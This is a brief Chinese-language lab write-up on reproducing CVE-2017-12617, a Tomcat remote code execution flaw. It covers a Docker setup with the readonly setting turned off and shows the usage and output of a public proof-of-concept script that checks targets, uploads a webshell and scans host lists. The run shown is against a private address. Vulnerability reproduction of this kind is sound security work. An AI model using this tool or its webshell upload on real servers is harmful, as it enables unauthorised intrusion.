CVE-2017-12617漏洞分析
CVE-2017-12617
Apache Tomcat團隊10月3日宣佈,如果配置了預設servlet,則在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有作業系統上的潛在危險的遠端執行程式碼(RCE)漏洞,CVE-2017-12617:遠端程式碼執行漏洞。
環境
使用image: tomcat:7.0.79-jre8復現漏洞
docker-compose up -d
修改 .\conf\web.xml 配置檔案,增加 readonly 設定為 false ,一定要記得重啟下tomcat服務。
為了不用每次都要匯入資料,我們將採用掛載的方式持久化,將需要修改的web.xml定義放在./目錄,掛載到容器指定目錄
volumes:
- ./web.xml:/usr/local/tomcat/conf/web.xml
poc
./cve-2017-12617.py [options]
options:
-u ,–url [::] check target url if it’s vulnerable
-p,–pwn [::] generate webshell and upload it
-l,–list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py –url
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py –list hosts.txt
python tomcat-cve-2017-12617.py -u http://10.160.11.191:8080
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ __ ____ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
Poc Filename Poc.jsp
File Created ..
http://10.160.11.191:8080 it's Vulnerable to CVE-2017-12617
http://10.160.11.191:8080/Poc.jsp